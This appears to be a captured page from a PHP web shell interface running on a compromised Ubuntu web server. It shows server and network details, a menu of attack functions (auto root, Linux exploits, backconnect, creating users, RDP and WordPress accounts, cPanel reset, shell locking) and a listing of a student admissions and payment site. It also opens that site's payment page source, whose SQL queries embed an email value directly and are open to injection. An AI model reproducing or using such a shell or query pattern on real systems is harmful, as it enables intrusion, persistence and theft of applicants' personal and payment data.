Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
conreg /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
bower_components
[ DIR ]
drwxr-xr-x
database
[ DIR ]
drwxr-xr-x
dist
[ DIR ]
drwxr-xr-x
documents
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
mailer
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
uploadDoc
[ DIR ]
drwxr-xr-x
validation
[ DIR ]
drwxr-xr-x
404.php
2.86
KB
-rw-r--r--
changePassword.php
4.67
KB
-rw-r--r--
class.user.php
3.69
KB
-rw-r--r--
common-oldbkp.php
5.19
KB
-rw-r--r--
common.php
5.99
KB
-rw-r--r--
config.php
296
B
-rw-r--r--
dashboard.php
7.11
KB
-rw-r--r--
dbconfig.php
1.31
KB
-rw-r--r--
error_log
5.69
KB
-rw-r--r--
forgotPassword.php
5.28
KB
-rw-r--r--
fpass.php
3.11
KB
-rw-r--r--
google_auth.php
2.06
KB
-rw-r--r--
index-login-bkp.php
5.62
KB
-rw-r--r--
index.php
11.97
KB
-rw-r--r--
logout.php
645
B
-rw-r--r--
logoutgmail.php
977
B
-rw-r--r--
page-top.php
5.8
KB
-rw-r--r--
pay-bkp15722.php
8.49
KB
-rw-r--r--
pay-oldbkp.php
5.39
KB
-rw-r--r--
pay.php
5.15
KB
-rw-r--r--
payNow-oldbkp.php
7.07
KB
-rw-r--r--
payNow.php
7.13
KB
-rw-r--r--
payNowLink-bkp15722.php
10.56
KB
-rw-r--r--
payNowLink.php
8.1
KB
-rw-r--r--
paymentlinkcn.php
7.95
KB
-rw-r--r--
paymentlinkcoa.php
8.33
KB
-rw-r--r--
paymentlinkcyber.php
7.95
KB
-rw-r--r--
paymentlinkdm.php
7.95
KB
-rw-r--r--
paymentlinkds.php
7.95
KB
-rw-r--r--
paymentlinkip.php
8.31
KB
-rw-r--r--
paymentlinkml.php
8.28
KB
-rw-r--r--
paymentlinkos.php
8.28
KB
-rw-r--r--
personalInformations-bkp15722....
16.31
KB
-rw-r--r--
personalInformations.php
19.12
KB
-rw-r--r--
register.php
18.78
KB
-rw-r--r--
registrationVerify.php
2.5
KB
-rw-r--r--
resetpass.php
5.27
KB
-rw-r--r--
verify-bkp15722.php
12.67
KB
-rw-r--r--
verify-oldbkp.php
7.15
KB
-rw-r--r--
verify.php
9.26
KB
-rw-r--r--
viewStudentDetails.php
18.73
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : payNow-oldbkp.php
<?php ob_start(); require __DIR__ . DIRECTORY_SEPARATOR . "lib" . DIRECTORY_SEPARATOR . "config.php"; // HTML require PATH_LIB . "page-top.php"; //session_start(); require_once 'common.php'; //require_once 'tutionFeePayment.php'; $studentID= $row['studentID']; $application_fee = new STUDENT(); $emailID = $row['studentEmail']; $stmt4 = $application_fee->runQuery("SELECT * FROM applicationfees WHERE studentID=:studentID1 and emailID='$emailID'"); $stmt4->execute(array(":studentID1"=>$studentID)); $rows4 = $stmt4->fetch(PDO::FETCH_ASSOC); ?> <style> table { font-family: arial, sans-serif; border-collapse: collapse; width: 100%; } td, th { border: 1px solid #dddddd; text-align: left; padding: 5px 10px; } tr:nth-child(even) { } .confirmationPage { width: 500px; margin: 0 auto; } .details { text-align:right; font-weight: bold; } </style> <!-- Content Wrapper. Contains page content --> <div class="content-wrapper"> <!-- Content Header (Page header) --> <section class="content-header"> <h1> Online Payment <!--<small>Control panel</small> --> </h1> <ol class="breadcrumb"> <li><a href="#"><i class="fa fa-dashboard"></i> Home</a></li> <li class="active">Online Payment</li> </ol> </section> <!-- Main content --> <section class="content"> <?php $stmt1 = $application_fee->runQuery("SELECT * FROM personalinformation WHERE studentID=:studentID1 and emailID='$emailID'"); $stmt1->execute(array(":studentID1"=>$studentID)); $row1 = $stmt1->fetch(PDO::FETCH_ASSOC); ?> <?php $stmt3 = $application_fee->runQuery("SELECT * FROM applicationfees WHERE studentID=:studentID1 and emailID='$emailID'"); $stmt3->execute(array(":studentID1"=>$studentID)); $row3 = $stmt3->fetch(PDO::FETCH_ASSOC); $applicationNo = "CSEDU" . $studentID ; ?> <form id="signupForm" name="signupForm" action="pay.php?authToken=<?php echo $tokenAuth;?>" method="post" enctype="multipart/form-data"> <!-- SELECT2 EXAMPLE --> <div class="box box-default"> <div class="box-header with-border"> <h3 class="box-title"><strong>Online Payment </strong></h3> </div> <!-- /.box-header --> <div class="box-body"> <?php $razorpay_order_id = $row3['razorpay_order_id']; ?> <?php if($razorpay_order_id<>"") { ?> <div class="confirmationPage" id="printableArea"> <table class="table table-bordered"> <tr > <td colspan="2"><img src="https://www.iiitd.ac.in/sites/all/themes/impact_theme/logo.png"></td> </tr> <tr> <td colspan="2"><p style="text-align: center; font-size: 15px;font-weight: bold;">CSEDU Module Admissions Dec 2021 IIIT-DELHI</p> </td> </tr> <tr > <td><label><strong>Applicant Name</strong></label></td> <td><?php echo $row3['studentName']; ?></td> </tr> <tr> <td> <label><strong>Email Id</strong></label></td> <td><?php echo $row3['emailID']; ?></td> </tr> <tr> <td><label><strong>Contact No.</strong></label></td> <td><?php echo $row3['mobileNumber']; ?></td> </tr> <tr> <td><label><strong>Application No.</strong></label></td> <td><?php echo $row3['applicationNo']; ?></td> </tr> <tr> <td><label><strong>Oreder Id.</strong></label></td> <td> <?php echo $row3['razorpay_order_id']; ?></td> </tr> <tr> <td><label><strong>Payment Id.</strong></label></td> <td> <?php echo $row3['razorpay_payment_id']; ?></td> </tr> <tr> <td><label><strong>Application Fee (Rs.)</strong></label></td> <td> <?php echo $row3['applicationFeeAm']; ?> </td> </tr> </table> </div> <?php } else { ?> <div class="confirmationPage"> <table class="table table-bordered"> <tr > <td colspan="2"><img src="https://www.iiitd.ac.in/sites/all/themes/impact_theme/logo.png"></td> </tr> <tr> <td colspan="2"><p style="text-align: center; font-size: 15px;font-weight: bold;">CSEDU Module Admissions Dec 2021 IIIT-DELHI</p> </td> </tr> <tr > <td><label><strong>Applicant Name</strong></label></td> <td><?php echo $row1['studentName']; ?></td> </tr> <tr> <td> <label><strong>Email Id</strong></label></td> <td><?php echo $row1['emailID']; ?></td> </tr> <tr> <td><label><strong>Contact No.</strong></label></td> <td><?php echo $row1['mobileNumber']; ?></td> </tr> <tr> <td><label><strong>Application No.</strong></label></td> <td><?php echo $applicationNo; ?></td> </tr> <tr> <td><label><strong>Application Fee (Rs.)</strong></label></td> <td>Rs. 1</td> </tr> </table> </div> <?php } ?> <input type="hidden" name="fullName" id="FullName" value="<?php echo $row1['studentName']; ?>"> <input type="hidden" name="emailID" id="emailID" class="form-control" autocomplete="off" value="<?php echo $row1['emailID']; ?>"> <input type="hidden" name="applicationFeeAm" id="applicationFeeAm" class="form-control" autocomplete="off" value="1"> <input type="hidden" name="contact1" id="contact1" class="form-control" autocomplete="off" value="<?php echo $row1['countryCode']; ?> <?php echo $row1['mobileNumber']; ?>"> <input type="hidden" name="studentID" id="studentID" class="form-control" autocomplete="off" value="<?php echo $row1['studentID']; ?>"> <input type="hidden" name="applicationNo" id="applicationNo" class="form-control" autocomplete="off" value="<?php echo $applicationNo; ?>"> <!-- first Box --> </div> <!-- /.box-body --> <div class="box-footer" style="text-align: center;"> <?php if($razorpay_order_id<>"") { ?> <button class="btn btn-primary hidden-print" onclick="printDiv('printableArea')"><span class="glyphicon glyphicon-print" aria-hidden="true"></span> Print</button> <?php } else { ?> <button type="submit" name="btn-submit" class="btn btn-info" >Proceed to pay</button> <?php } ?> </div> </div> </form> </section> <!-- /.content --> </div> <script > function printDiv(divName) { var printContents = document.getElementById(divName).innerHTML; var originalContents = document.body.innerHTML; document.body.innerHTML = printContents; window.print(); document.body.innerHTML = originalContents; } </script> <?php ob_end_flush(); require PATH_LIB . "page-bottom.php"; ?> <?php ob_end_flush(); require PATH_LIB . "page-bottom.php"; ?>
Close